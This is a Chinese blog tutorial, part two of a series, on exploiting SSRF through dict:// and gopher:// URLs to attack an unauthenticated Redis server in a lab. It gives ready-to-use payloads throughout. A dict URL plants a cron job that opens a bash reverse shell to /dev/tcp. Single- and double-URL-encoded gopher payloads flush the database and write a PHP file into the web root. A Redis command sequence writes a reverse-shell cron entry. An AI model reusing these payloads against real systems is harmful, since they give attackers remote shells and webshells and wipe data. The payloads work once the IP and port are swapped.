SSRF之利用dict和gopher吊打Redis (2)

日期:2021-06-03 栏目:程序人生 浏览:

image-20201223182344439

靶机redis有成功写入,注意最后写save刷新缓存。

image-20201223182404919

蚁剑连接

image-20201223204150542

dict打Redis之计划任务反弹shell

因为利用redis去ubuntu写总会有很多玄学问题,这里就用上面准备的centos的redis环境。

set 1 '\n\n*/1 * * * * root /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n' 转换一下即: url=dict://192.168.124.153:6380/set:shell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.124.141/2333\x200\x3e\x261\n\n" 但还要注意这里不能够这么写:\x5c 而应该直接就 \n,也不要写\r\n 因为linux换行符就是\n你写\r反而可能会出现参数污染

image-20201230225238747

gopher协议利用 gopher写入webshell

这里利用sec_tools生成gopher协议的payload

工具:https://github.com/firebroo/sec_tools/tree/master/

使用方法:

redis.cmd写入攻击所需的redis指令

image-20201229161117660

运行 redis-over-gopher.py 得到payload

image-20201229161259613

根据目标信息把ip和port换一下即可

如果这里使用的是curl命令(比如在命令行curl + gopher)url编码一次即可。也就是用下面的payload就可以

gopher://192.168.124.153:6380/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%31%33%0d%0a%73%68%65%6c%6c%5f%73%65%63%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

如果是web端的参数有ssrf,需要url编码两次才可以打进去,只编码一次时 ? 会作为干扰使得后面payload打不进去。编码时只把特殊符号编码即可,如下:

gopher://192.168.124.153:6380/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2531%2533%250d%250a%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2531%2533%250d%250a%2573%2568%2565%256c%256c%255f%2573%2565%2563%252e%2570%2568%2570%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2538%250d%250a%2577%2565%2562%2573%2568%2565%256c%256c%250d%250a%2524%2531%2538%250d%250a%253c%253f%2570%2568%2570%2520%2570%2568%2570%2569%256e%2566%256f%2528%2529%253b%253f%253e%250d%250a%252a%2531%250d%250a%2524%2534%250d%250a%2573%2561%2576%2565%250d%250a

写入成功。

image-20201229163050072

gopher定时任务反弹shell

关于定时任务:

centos: 在/var/spool/cron/root 或 /etc/crontab

ubuntu: 在/var/spool/cron/crontabs/root 或 /etc/crontab

Ubuntu这个计划任务吧,利用redis写入总会出现问题,这里使用centos的环境。

与dict打redis类似先将弹shell语句写入 redis.cmd

flushall config set dir /var/spool/cron config set dbfilename root set shell "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.124. 141/2333 0>&1\n\n" save

运行redis-over-gopher.py生成payload,更改payload中的ip和port

上一篇:Mysql主从架构
下一篇:没有了

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpxwzj.html

相关推荐